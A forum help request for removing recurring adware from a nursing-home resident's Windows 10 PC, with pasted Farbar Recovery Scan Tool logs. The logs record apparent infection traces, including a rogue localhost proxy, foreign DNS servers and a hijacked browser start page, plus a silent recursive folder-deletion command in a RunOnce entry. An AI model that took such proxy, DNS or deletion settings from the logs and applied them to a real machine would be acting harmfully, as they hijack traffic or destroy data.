
Malware/adware keeps returning



Hello, and thank you in advance. I tutor an older woman in a nursing home on PC use and she is having Adware problems on her PC. I offered to help her remove it, she gets so much joy from her PC! But I'm stuck, no matter what I do it comes back and leaves her PC unusable. I have pasted the FRST logs here and attached the first two Malwarebytes logs. I also reset all the browsers on her machine after the second scan, to no avail.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 Ran by bbabq (administrator) on DESKTOP-N1B6HJU (03-04-2016 13:41:28) Running from C:\Users\bbabq\Desktop Loaded Profiles: bbabq & (Available Profiles: bbabq) Platform: Windows 10 Home Version 1511 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\tbaseprovisioning.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe () C:\Program Files\AVAST Software\SecureLine\vpnsvc.exe () C:\Program Files\CyberLink\Shared files\RichVideo64.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe (AMD) C:\Windows\System32\atieclxx.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Microsoft Corporation) 
C:\Windows\System32\SettingSyncHost.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (MyHeritage) C:\Program Files (x86)\MyHeritage\Bin\FTBCheckUpdates.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe (AVAST Software) C:\Program Files\AVAST Software\SecureLine\secureline.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe (TeamViewer GmbH) C:\Users\bbabq\AppData\Local\Temp\TeamViewer\TeamViewer_2016-04-03-10-38-30.exe (Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe (TeamViewer GmbH) C:\Users\bbabq\AppData\Local\Temp\TeamViewer\TeamViewer_Desktop.exe () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8843520 2016-04-02] (Realtek Semiconductor) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3945656 2016-01-27] (Synaptics Incorporated) HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-07] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation) HKLM-x32\...\Run: [PowerDVD14Agent] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795336 2016-01-29] (CyberLink Corp.) HKLM-x32\...\Run: [Family Tree Builder Update] => C:\Program Files (x86)\MyHeritage\Bin\FTBCheckUpdates.exe [14174928 2016-03-22] (MyHeritage) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-19] (Skype Technologies S.A.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\RunOnce: [Uninstall C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64" HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-19] (Skype Technologies S.A.) 
HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [Uninstall C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64" BootExecute: autocheck autochk * sdnclean64.exe ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) ProxyEnable: [S-1-5-20] => Proxy is enabled. ProxyServer: [S-1-5-20] => http=localhost:56668; ProxyEnable: [S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0] => Proxy is enabled. ProxyServer: [S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0] => http=localhost:56668; Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25 Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{2a968ed2-a93b-45f7-bcb6-a1d435494652}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{2a968ed2-a93b-45f7-bcb6-a1d435494652}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{a3ba1a2f-f0eb-4605-a4f8-f1759421390a}: [NameServer] 82.163.142.7 95.211.158.134,8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{a3ba1a2f-f0eb-4605-a4f8-f1759421390a}: [DhcpNameServer] 192.168.0.1 205.171.2.25 Tcpip\..\Interfaces\{e5783318-d6a8-4ace-8b4c-81b2b72b4cc6}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{e5783318-d6a8-4ace-8b4c-81b2b72b4cc6}: [DhcpNameServer] 82.163.142.7 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_dnldstr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0F0CtA0F0D0BtAzz0FyE0F0A0Czzzz0EtN0D0Tzu0StCyEzzyBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2StA0ByDtCyEyEyE0FtGtBtAyByCtGyBtByDtDtGtB0D0AyEtGtA0BtCyEtD0FyE0F0BzyyCyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0ByB0CyBzytCtDyBtGyD0EtAtCtGyEtBtBzztGzytB0F0CtGtBtAyDyCyC0A0EyE0CtD0FtB2QtN0A0LzuyE%26cr%3D1179455443%26a%3Dwncy_dnldstr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = SearchScopes: HKLM-x32 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-1042049586-4185267109-2020147840-1002 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-1042049586-4185267109-2020147840-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {E28C3100-2907-479E-BD5C-519AA0C7EED6} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll 
[2016-04-02] (Oracle Corporation) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-04-30] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-04-02] (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-02-25] (HP) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File FireFox: ======== FF ProfilePath: C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742 FF DefaultSearchEngine.US: Google FF Homepage: google.com FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_197.dll [2016-03-23] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_197.dll [2016-03-23] () FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1223183.dll [2015-12-21] (Adobe Systems, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-04-02] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-04-02] (Oracle Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.) 
FF Extension: LastPass - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\support@lastpass.com [2016-04-02] FF Extension: NoScript - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-04-03] FF Extension: WOT - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2016-04-03] FF Extension: Adblock Plus - C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-02] FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-25] [not signed] Chrome: ======= CHR DefaultSearchKeyword: Default -> lp CHR Profile: C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-04-02] CHR Extension: (Google Drive) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-02] CHR Extension: (YouTube) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-02] CHR Extension: (Google Docs Offline) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-02] CHR Extension: (AdBlock) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-02] CHR Extension: (LastPass: Free Password Manager) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2016-04-02] CHR Extension: (Chrome Web Store Payments) - C:\Users\bbabq\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02] CHR Extension: (Gmail) - C:\Users\bbabq\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-02] ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S2 AdaptiveSleepService; c:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [138752 2015-08-06] () [File not signed] R2 AMD FUEL Service; c:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-08-06] (Advanced Micro Devices, Inc.) [File not signed] S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 HPSupportSolutionsFrameworkService; c:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company) R2 HPWMISVC; c:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.) S2 Kingsoft_WPS_UpdateService; C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdatesvr.exe [133480 2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes) S3 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-12-03] (McAfee, Inc.) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [338208 2015-03-19] (McAfee, Inc.) S2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) 
S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.) S4 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [679120 2015-10-20] (McAfee, Inc.) S3 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] () R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [310016 2016-04-02] (Realtek Semiconductor) R2 SecureLine; C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe [465088 2016-03-01] () R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2016-01-27] (Synaptics Incorporated) R2 tbaseprovisioning; C:\Windows\SysWOW64\tbaseprovisioning.exe [60432 2015-08-18] (Advanced Micro Devices, Inc.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation) S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X] S2 TrezaaService; "C:\Program Files (x86)\Trezaa\Trezaa.Service.exe" [X] ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 AmdAS4; C:\Windows\System32\drivers\AmdAS4.sys [18968 2015-08-18] (Advanced Micro Devices, INC.) S3 amdkmcsp; C:\Windows\system32\DRIVERS\amdkmcsp.sys [101104 2015-08-18] (Advanced Micro Devices, Inc. ) R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [82704 2015-08-18] (Advanced Micro Devices, Inc.) 
R0 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [277240 2015-08-18] (Advanced Micro Devices, Inc. ) R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-08-18] (Advanced Micro Devices) R3 clwvd6; C:\Windows\system32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation) S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-03] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) S2 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.) S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-10-06] (McAfee, Inc.) R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-18] (Realtek ) S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [411712 2015-05-21] (Realsil Semiconductor Corporation) R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [4738672 2016-02-06] (Realtek Semiconductor Corporation ) R3 SmbDrv; C:\Windows\system32\DRIVERS\Smb_driver_AMDASF.sys [42184 2016-01-27] (Synaptics Incorporated) S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [33960 2015-07-13] (Synaptics Incorporated) S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation) R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) 
==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-04-03 13:41 - 2016-04-03 13:42 - 00019553 _____ C:\Users\bbabq\Desktop\FRST.txt 2016-04-03 13:41 - 2016-04-03 13:41 - 00000000 ____D C:\FRST 2016-04-03 13:37 - 2016-04-03 13:40 - 02374144 _____ (Farbar) C:\Users\bbabq\Desktop\FRST64.exe 2016-04-03 13:23 - 2016-04-03 13:23 - 00000085 _____ C:\WINDOWS\wininit.ini 2016-04-03 13:20 - 2016-04-03 13:20 - 00004143 _____ C:\Users\bbabq\Documents\4-2 Malwarebytes Scan.txt 2016-04-03 13:12 - 2016-04-03 13:12 - 00016061 _____ C:\Users\bbabq\Documents\Spybot Scan Results.160403-1311.txt 2016-04-03 12:36 - 2016-04-03 12:36 - 00026745 _____ C:\Users\bbabq\Documents\First log Malware Bytes.txt 2016-04-03 12:00 - 2016-04-03 12:00 - 00000000 ____D C:\ProgramData\7a9cc0ea-47d1-0 2016-04-03 12:00 - 2016-04-03 12:00 - 00000000 ____D C:\ProgramData\7a9cc0ea-3fa3-1 2016-04-03 11:57 - 2016-04-03 11:57 - 00001047 _____ C:\Users\bbabq\Documents\malwarebytes.txt 2016-04-03 11:52 - 2016-04-03 13:23 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2016-04-03 11:52 - 2016-04-03 11:52 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2016-04-03 11:51 - 2016-04-03 13:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2016-04-03 11:48 - 2016-04-03 11:49 - 46525608 _____ (Safer-Networking Ltd. 
) C:\Users\bbabq\Downloads\spybot-2.4.exe 2016-04-03 10:46 - 2016-04-03 10:46 - 02085168 _____ C:\Users\bbabq\Downloads\Adaware_Installer.exe 2016-04-02 19:55 - 2016-04-02 19:59 - 22851472 _____ (Malwarebytes ) C:\Users\bbabq\Downloads\mbam-setup-web.NT-2.2.1.1043.exe 2016-04-02 14:12 - 2016-04-02 14:12 - 00621299 _____ C:\Users\bbabq\Downloads\150100.pdf 2016-04-02 13:24 - 2016-04-02 13:24 - 00000000 ____D C:\Users\bbabq\Desktop\Old Firefox Data 2016-04-02 10:50 - 2016-04-02 11:04 - 00000000 ____D C:\Users\bbabq\Documents\MyHeritage 2016-04-02 10:49 - 2016-04-02 10:49 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\The Complete Genealogy Reporter - FTB 2016-04-02 10:49 - 2016-04-02 10:49 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MyHeritage.com 2016-04-02 10:49 - 2012-08-02 08:56 - 00606208 _____ (Lorenzi Davide) C:\WINDOWS\SysWOW64\HexUniRTFBox.ocx 2016-04-02 10:49 - 2010-06-17 19:49 - 02029056 _____ (Bytescout) C:\WINDOWS\SysWOW64\PDFDocScout.DLL 2016-04-02 10:49 - 2004-12-07 11:11 - 00258352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unicows.dll 2016-04-02 10:49 - 2003-07-06 14:07 - 00372736 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\ijl15.dll 2016-04-02 10:49 - 2002-03-07 01:19 - 00454656 _____ () C:\WINDOWS\SysWOW64\PaintX.dll 2016-04-02 10:49 - 2000-05-22 17:58 - 00608448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.ocx 2016-04-02 10:49 - 2000-03-14 00:00 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSSTDFMT.DLL 2016-04-02 10:49 - 1998-06-24 01:00 - 00137000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmapi32.ocx 2016-04-02 10:48 - 2016-04-02 11:03 - 00000000 ____D C:\ProgramData\MyHeritage 2016-04-02 10:48 - 2016-04-02 10:57 - 00000000 ____D C:\Users\bbabq\AppData\Roaming\MyHeritage 2016-04-02 10:47 - 2016-04-02 10:48 - 00000000 ____D C:\Program Files (x86)\MyHeritage 2016-04-02 10:37 - 2016-04-02 10:37 - 00001863 _____ C:\ProgramData\Microsoft\Windows\Start 
Menu\Programs\DTS Audio Control Panel.lnk 2016-04-02 10:36 - 2016-04-02 10:37 - 00000000 ____D C:\WINDOWS\LastGood 2016-04-02 10:36 - 2016-04-02 10:34 - 01943624 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 01435152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 01022872 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00532384 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00467160 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00381408 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00341160 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00341160 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll 2016-04-02 10:36 - 2016-04-02 10:34 - 00258504 _____ (TODO:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by bbabq (2016-04-03 13:43:36) Running from C:\Users\bbabq\Desktop Windows 10 Home Version 1511 (X64) (2016-01-29 11:36:51) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1042049586-4185267109-2020147840-500 - Administrator - Disabled) bbabq (S-1-5-21-1042049586-4185267109-2020147840-1002 - Administrator - Enabled) => C:\Users\bbabq DefaultAccount (S-1-5-21-1042049586-4185267109-2020147840-503 - Limited - Disabled) Guest (S-1-5-21-1042049586-4185267109-2020147840-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Spybot - Search and Destroy (Disabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0} AS: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated) Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.197 - Adobe Systems Incorporated) Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.3.183 - Adobe Systems, Inc.) 
